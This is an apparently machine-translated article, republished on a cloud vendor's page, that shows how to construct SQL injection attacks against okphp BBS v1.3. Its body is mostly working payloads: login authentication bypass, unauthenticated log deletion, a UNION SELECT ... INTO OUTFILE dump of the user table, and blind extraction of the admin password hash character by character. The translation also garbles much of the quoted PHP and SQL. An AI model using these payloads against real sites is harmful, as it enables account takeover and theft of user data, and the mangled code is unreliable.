On the construction of PHP+MYSQL injection statement

Source: Internet
Author: User
Tags hash mysql mysql injection mysql version variables sql injection variable file permissions
mysql| statement

Because of PHP and MySQL itself, php+mysql injection is more difficult than the ASP, especially in the injection of the structure of the statement is a difficult, this article is mainly borrowed from the okphp BBS v1.3 some documents to simple analysis, to talk about the Php+mysql injection statement construction method, I hope this article is of some help to you.
Statement: The article all mentioned "loophole", have not been tested, may not exist, in fact, there is no loophole is not important, it is important to analyze ideas and sentence construction.

Two. " Vulnerability "Analysis:

1.admin/login.php injection causes bypass of authentication vulnerabilities:

Code:
$conn =sql_connect ($dbhost, $dbuser, $DBPSWD, $dbname);
$password = MD5 ($password);
$q = "Select id,group_id from $user _table where username= ' $username ' and password= ' $password '";
$res = Sql_query ($q, $conn);
$row = Sql_fetch_row ($res);

$q = "Select id,group_id from $user _table where username= ' $username ' and password= ' $password '"
$username and $password do not filter, it is easy to bypass.
Methods for transforming statements such as SELECT * from $user _table where username= ' $username ' and password= ' $password ' are:

Construct 1 (using logical operations): $username = ' or ' a ' = ' a $password = ' or ' a ' = ' a '

Equivalent to SQL statements:
SELECT * from $user _table where username= ' or ' a ' = ' a ' and password= ' or ' a ' = ' a '

Construction 2 (using the comment statement # in MySQL,/* $password comments): $username =admin ' # (or admin ' * *)

That
SELECT * from $user _table where username= ' admin ' # ' and password= ' $password '

Equivalent:
SELECT * from $user _table where username= ' admin '

The $password in the $Q statement in admin/login.php is MD5 encrypted before the query so it is not possible to bypass the statements in construct 1. Here we use construct 2:

Select id,group_id from $user _table where username= ' admin ' and password= ' $password '

Equivalent:
Select id,group_id from $user _table where username= ' admin '

As long as the existence of user name admin is set up, if you do not know the user name, only know the corresponding ID,
We can construct this way: $username = ' OR id=1#

Equivalent:
Select id,group_id from $user _table where username= ' OR id=1# and password= ' $password ' (#后的被注释掉)

We went on to look at the code:
if ($row [0]) {
If not admin or Super Moderator
if ($username!= "admin" &&!eregi ("(^ &) 3 ($ &)", $row [1])) {
$login = 0;
}

else {
$login = 1;
}
}
Fail to login---------------
if (! $login) {
Write_log ("Moderator login", "0", "password Wrong");
echo ";
Exit ();
}
Access! -------------
else {
Session_Start ();

Oh ~ ~ Finally simple through a $login to judge, we as long as IE submit direct submission $login=1 can bypass the:).


2.users/login.php injection causes bypass of authentication vulnerabilities:
Code:
$MD 5password = MD5 ($password);
$q = "Select Id,group_id,email from $user _table where username= ' $username ' and password= ' $md 5password '";
$res = Sql_query ($q, $conn);
$row = Sql_fetch_row ($res);

$username did not filter the use of the same 1 notes out and password= ' $md 5password ';


3.admin\log\list.php there is an arbitrary delete log logging vulnerability. PS: This seems to have nothing to do with php+mysql injection, casually mention it.

Okphp's background seems to write very sloppy, all files do not determine whether the administrator has landed, so that arbitrary access. Let's look at the list.php code:

$arr = Array ("Del_log", "log_id", "del_id");
Get_r ($arr);
//
if ($del _log) {
Omitted........
if ($log _id) {
foreach ($log _id as $val) {
$q = "Delete from $log _table where id= ' $val '";
$res = Sql_query ($q, $conn);
if ($res) {
$i + +;
}
}
}
ElseIf ($del _id) {
$q = "Delete from $log _table where id= ' $del _id '";
$res = Sql_query ($q, $conn);
}
$TPL->setvariable ("message", "$i log deleted ok!");
$TPL->setvariable ("Action", "Index.php?action=list_log");
}

The code simply uses Get_r ($arr), the judgment of the submitted parameters, we simply submit the corresponding $del_log, $log _id, $del _id. Delete succeeded on the back.

4. Multiple files on variables without filtering causes SQL injection vulnerabilities.
Okphp's authors seem to dislike filtration:). Basically all the variables in the SQL statements are "naked". I will not list the specific documents, please look at the code, I use \forums\list_threads.php as an example of a simple talk.

Look at the list_threads.php code:

$q = "Select Name,belong_id,moderator,protect_view,type_class,theme_id,topic_num,faq_num,cream_num,recovery_num, Post_num from $type _table where id= ' $forum _id ' ";
$res = Sql_query ($q, $conn);
$row = Sql_fetch_row ($res);

Variable $forum_id does not filter, because MySQL does not support subqueries, we can use the Union Construction statement for Federated query (required MySQL version of more than 4.00) to implement the cross-library operations, we construct the following:

Construct 1: Use the SELECT * from table into outfile '/path/file.txt ' (requires MySQL to have file permissions, note the absolute path in the win system, such as: C://path//file.txt). Enter the contents of the query into the file.txt, and then we can pass http://ip/path/file.txt to access the results of the query. The above we can construct $forum_id:

$forum _id= ' UNION SELECT * user_table into outfile '/path/file.txt '

Following:
$q = "Select Name,belong_id,moderator,protect_view,type_class,theme_id,topic_num,faq_num,cream_num,recovery_num, Post_num from $type _table where id= ' $forum _id ' union SELECT * from user_table into outfile '/path/file.txt ' ";


The above method requires more stringent, must get the path of the Web (usually by submitting the wrong variable to make MySQL error), and PHP magic_gpc=on option so that the injection can not appear in single quotes. If Magic_gpc=on we can also bypass:

Construction 2: Just like an ASP cross library query, directly using the Union select constructs statements, so that the return results are different to guess the solution, this method can bypass single quotes (magic_gpc=on) continue to inject, but in PHP this injection is relatively difficult, depending on the specific code. Please refer to Pinkeyes's article "PHP Injection example" for specific statement construction. I'll combine okphp with an example of an injection that uses "different return results": (see vulnerability 5).

5.admin/login.php and users/login.php are constructed by SQL statements to guess the hash of the specified user password: (in fact, this and the vulnerability 1 and 2 are the same, here alone, the main description of the method of statement construction.) )

Problem code with vulnerability 1.
The construction of the statement (PS: Because the statement itself is a user library operation is not necessary to use Union):
$username =admin ' and LENGTH (password) =6#

The SQL statement becomes:
$q = "Select id,group_id from $user _table where username= ' admin ' and LENGTH (password) =6# ' and password= ' $password '"

Equivalent:
$q = "Select id,group_id from $user _table where username= ' admin ' and LENGTH (password) =6 '"

If length (password) =6 set up, then normal return, if not established, MySQL will be the error.

Oh, so we can guess the user admin password hash. such as $username=admin ' ord (substring (password,1,1)) =57#
You can guess the first bit of the user's password ASCII value ...


Three. Something:

This article is in the Internet café to read the code to write out, but only a cursory look at the code, the article mentioned "loopholes" have not been tested. There may be "holes" that don't exist, may also miss a lot of things, these are not very important, because the main purpose of this article is to see the php+mysql injection of the sentence structure, through this article, you can see: Although it looks like PHP is more secure than ASP, but a variable does not filter completely, PHP injection is more flexible than the ASP injection, more injection methods. Due to the author level and other reasons, the article may be a lot of mistakes, but also please more guidance.



Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.